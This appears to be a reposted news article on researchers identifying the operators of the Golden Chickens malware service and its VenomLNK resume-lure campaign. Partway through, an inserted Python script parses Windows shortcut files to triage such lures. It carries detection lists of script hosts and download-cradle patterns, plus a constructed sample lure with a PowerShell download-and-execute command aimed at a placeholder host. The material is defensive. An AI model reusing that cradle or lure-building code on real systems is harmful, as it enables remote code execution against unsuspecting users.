CIO News Hubb

Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service

by admin
January 27, 2023
in Information Security


Jan 27, 2023Ravie LakshmananThreat Response / Cyber Crime

Cybersecurity researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona “badbullzvenom.”

eSentire’s Threat Response Unit (TRU), in an exhaustive report published following a 16-month-long investigation, said it “found multiple mentions of the badbullzvenom account being shared between two people.”

The second threat actor, known as Frapstar, is said to identify themselves as “Chuck from Montreal,” enabling the cybersecurity firm to piece together the criminal actor’s digital footprint.

This includes his real name, pictures, home address, the names of his parents, siblings, and friends, along with his social media accounts and his interests. He is also said to be the sole proprietor of a small business that’s run from his own home.

Golden Chickens, also known as Venom Spider, is a malware-as-a-service (MaaS) provider that’s linked to a variety of tools such as Taurus Builder, software to create malicious documents; and More_eggs, a JavaScript downloader that’s used to serve additional payloads.

The threat actor’s cyber arsenal has been put to use by other prominent cybercriminal groups like Cobalt Group (aka Cobalt Gang), Evilnum, and FIN6, all of which are estimated to have collectively caused losses totaling $1.5 billion.


Past More_eggs campaigns, some dating back to 2017, have involved spear-phishing business professionals on LinkedIn with bogus job offers; a successful infection gives the threat actors remote control over the victim's machine, which they then use to harvest information or deploy more malware.

Last year, in a reversal of sorts, the same tactics were employed to strike corporate hiring managers with resumes laden with malware as an infection vector.

The earliest documented record of Frapstar's activity goes back to May 2015, when Trend Micro described the individual as a "lone criminal" and a luxury car enthusiast.

“‘Chuck,’ who uses multiple aliases for his underground forum, social media, and Jabber accounts, and the threat actor claiming to be from Moldova, have gone to great lengths to disguise themselves,” eSentire researchers Joe Stewart and Keegan Keplinger said.

“They have also taken great pains to obfuscate the Golden Chickens malware, trying to make it undetectable by most AV companies, and limiting customers to using Golden Chickens for ONLY targeted attacks.”

It’s suspected that Chuck is one of the two threat actors operating the badbullzvenom account on the Exploit.in underground forum, with the other party possibly located in Moldova or Romania, eSentire noted.

The Canadian cybersecurity company said it further uncovered a new attack campaign targeting e-commerce companies, in which recruiters are tricked into downloading from a website a rogue Windows shortcut file that masquerades as a resume.

The shortcut, tracked as VenomLNK, serves as the initial access vector and drops More_eggs or TerraLoader, which in turn acts as a conduit for further modules: TerraRecon (victim profiling), TerraStealer (information theft) and TerraCrypt (ransomware extortion).
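The shortcut-as-resume lure described above lends itself to a simple static triage check before a file ever reaches a recruiter's desktop. The script below is an added example, not code from the original article or from eSentire: a minimal parser for the Windows Shell Link (.lnk) binary format that pulls out the relative target path, arguments, icon location and ShowCommand, plus a heuristic that flags shortcuts pointing at script hosts with hidden-window or download-cradle arguments. The sample shortcut bytes are constructed inside the script and are not a VenomLNK specimen; the script-host list and argument patterns are illustrative assumptions, not a complete detection rule.

```python
import struct
import uuid

# Added example: static triage of a Windows shortcut (.lnk) used as a lure.
# The sample shortcut built below is constructed here and is not a real
# VenomLNK file; the watch lists are illustrative assumptions.

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData sections follow in this fixed order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed watch lists: script hosts a "resume" never needs to launch, and
# command-line fragments typical of download cradles.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe",
}
SUSPICIOUS_ARGS = (
    "-enc", "-w hidden", "windowstyle hidden", "iex", "downloadstring",
    "invoke-webrequest", "http://", "https://", "javascript:",
)


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields from a Shell Link file."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the item ID list
        idlist_size, = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:                    # skip the LinkInfo structure
        info_size, = struct.unpack_from("<I", data, off)
        off += info_size
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, off)   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_lnk(filename: str, data: bytes) -> list:
    """Return the reasons this shortcut looks like a lure (empty list = nothing found)."""
    fields = parse_lnk(data)
    findings = []
    target = _basename(fields.get("relative_path", ""))
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {target}")
    if fields["show_command"] == 7:              # SW_SHOWMINNOACTIVE: window starts minimized
        findings.append("window minimized on launch (SW_SHOWMINNOACTIVE)")
    args = fields.get("arguments", "").lower()
    for needle in SUSPICIOUS_ARGS:
        if needle in args:
            findings.append(f"argument pattern: {needle}")
    name = filename.lower()
    if name.endswith(".lnk") and name.count(".") >= 2:
        findings.append("double extension hides the .lnk suffix")
    icon = _basename(fields.get("icon_location", ""))
    if target in SCRIPT_HOSTS and icon and icon != target:
        findings.append(f"icon borrowed from another file: {icon}")
    return findings


def build_sample_lnk(relative_path: str, arguments: str = "", icon: str = "",
                     show_command: int = 1) -> bytes:
    """Build a minimal .lnk (constructed test input, not a real malware sample)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon else 0
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        0x4C, LNK_CLSID.bytes_le, flags, 0x20,   # HeaderSize, CLSID, LinkFlags, FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,                                  # Creation/Access/Write FILETIMEs
        0, 0, show_command,                       # FileSize, IconIndex, ShowCommand
        0, 0, 0, 0,                               # HotKey, Reserved1..3
    )
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon) if s)
    return header + body + b"\x00\x00\x00\x00"    # TerminalBlock closes ExtraData


# Constructed lure: PowerShell download cradle dressed up as a PDF resume.
SAMPLE_NAME = "Resume_Jane_Doe.pdf.lnk"
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/r\')"',
    r"%SystemRoot%\System32\imageres.dll",
    show_command=7,
)
# Constructed benign shortcut for contrast.
BENIGN_NAME = "Notepad++.lnk"
BENIGN_LNK = build_sample_lnk(r"..\..\Program Files\Notepad++\notepad++.exe")

if __name__ == "__main__":
    for reason in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print(reason)
```

The parser deliberately skips the LinkTargetIDList; real lures often carry the target only in that item ID list (relative path absent), so a production triage tool should also walk the IDList and the LinkInfo local base path rather than treating a missing relative path as benign. Running the script on the constructed lure prints the script-host, minimized-window, cradle-argument, double-extension and borrowed-icon findings, while the benign shortcut produces none.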

“The malware suite is still actively being developed and is being sold to other threat actors,” the researchers concluded, urging organizations to be on the lookout for potential phishing attempts.
